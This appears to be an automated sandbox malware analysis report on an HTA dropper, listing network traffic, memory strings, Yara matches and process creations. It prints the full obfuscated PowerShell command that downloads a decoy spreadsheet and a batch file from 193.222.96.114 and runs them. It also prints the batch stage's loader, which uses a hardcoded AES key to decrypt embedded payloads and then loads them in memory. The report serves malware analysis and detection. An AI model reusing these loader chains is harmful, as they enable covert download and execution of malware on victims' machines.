Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114

Source: global traffic	HTTP traffic detected: GET /rules/rule170012v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287

Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.2
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.22
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.9
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.1
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.11
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:72
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:728
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/G
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/Go
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoG
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.b
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.ba
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.bat
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/jiteon.xlsx
Source: svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB3325D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2066
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2190
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2066	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2190	Jump to behavior

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR

Source: classification engine

Classification label: mal100.troj.winHTA@22/17@0/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\jiteon.xlsx

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hta.hta	Virustotal: Detection: 39%
Source: hta.hta	ReversingLabs: Detection: 39%

Source: powershell.exe

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\hta.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
